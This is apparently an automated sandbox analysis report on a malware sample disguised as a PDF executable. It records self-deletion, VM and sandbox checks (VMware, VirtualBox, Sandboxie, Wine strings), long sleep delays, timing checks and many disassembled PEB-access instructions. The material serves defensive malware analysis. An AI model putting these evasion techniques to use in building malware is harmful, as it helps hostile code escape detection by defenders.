Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_00409F74 push esp; ret

Source: initial sample

Static PE information: section name: .text entropy: 6.846311012403682

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\SysWOW64\svchost.exe

File deleted: c:\users\user\desktop\am project pdf.exe

Jump to behavior

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AM PROJECT PDF.exe PID: 5088, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe TID: 772	Thread sleep time: -41226s >= -30000s
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe TID: 676	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Code function: 6_2_01235BA5 rdtsc

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

API coverage: 7.7 %

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Thread delayed: delay time: 41226
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Thread delayed: delay time: 922337203685477

Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II2VM Additions S3 Trio32/64
Source: explorer.exe, 0000000D.00000000.382638734.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: QEMUTSOFTWARE\Oracle\VirtualBox Guest Additions
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 0000000D.00000000.382638734.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000D.00000000.327111690.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 0000000D.00000000.335831533.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 0000000D.00000000.382638734.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 0000000D.00000000.400886087.00000000050A1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: AM PROJECT PDF.exe, 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IdentifierDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000D.00000000.382638734.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.exe,-4000
Source: explorer.exe, 0000000D.00000000.335831533.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Code function: 6_2_01235BA5 rdtsc

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01169100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01169100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01169100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01184120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01184120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01184120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01184120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01184120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_012249A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_012249A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_012249A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_012249A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01192990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011899BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011899BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011899BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011899BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011899BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011961A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011961A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011F41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01234015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01234015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01180050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01180050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01222073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01231074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01169080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011920A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011920A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011920A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011920A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011920A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011920A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011FB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011FB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011FB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011FB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011FB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011FB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011640E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011640E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011640E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011658EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01193B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01193B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01238B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01235BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01192397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01171B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01171B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0121D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01194BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01194BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01194BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011903E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011903E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011903E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011903E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011903E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011903E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01183A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01165210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01165210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01165210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01165210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01178A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01238A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0121B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0121B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011F4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01169240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01169240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01169240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01169240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011652A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011652A5 mov eax, dword ptr fs:[00000030h]
